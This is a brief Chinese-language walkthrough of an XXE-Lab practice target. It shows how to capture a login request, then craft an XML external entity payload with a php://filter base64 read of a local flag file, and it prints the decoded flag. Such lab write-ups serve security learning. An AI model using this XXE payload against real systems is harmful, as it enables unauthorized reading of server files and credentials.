XXE-Lab靶场漏洞复现

1.尝试登录

输入账号admin/密码admin进行登录,并未有页面进行跳转

2.尝试抓包分析请求包数据

我们可以发现页面中存在xml请求,我们就可以构造我们的xml请求语句来获取想要的数据

3.构造语句

复制代码
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag">
]>
&xxe;

这里我们需要将xml语句放入post请求体中并发送

如上图所示便是我们需要获取的数据

4.数据解码

将获取的数据进行解码后我们即可得到我们的flag

flag{dmsioamdoiasdmdmwmdsmd}

相关推荐
Lei活在当下5 小时前
Codex 工程化实践指南:深入理解 AGENTS.md、SKILL.md 与 MCP
android·openai·ai编程
修炼者6 小时前
Toast的显示流程
android
simplepeng9 小时前
Room 3.0 KMP Alpha-01
android·kotlin·android jetpack
Lei活在当下9 小时前
Windows 下 Codex 高效工作流最佳实践
android·openai·ai编程
fatiaozhang95279 小时前
基于slimBOXtv 9.19.0 v4(通刷晶晨S905L3A/L3AB芯片)ATV-安卓9-完美版线刷固件包
android·电视盒子·刷机固件·机顶盒刷机·晶晨s905l3ab·晶晨s905l3a
私房菜10 小时前
Selinux 及在Android 的使用详解
android·selinux·sepolicy
一只特立独行的Yang11 小时前
Android中的系统级共享库
android
两个人的幸福online11 小时前
php开发者 需要 协程吗
android·开发语言·php
修炼者12 小时前
WindowManager(WMS)构建全局悬浮窗
android
xiaoshiquan120613 小时前
Android Studio里,SDK Manager显示不全问题
android·ide·android studio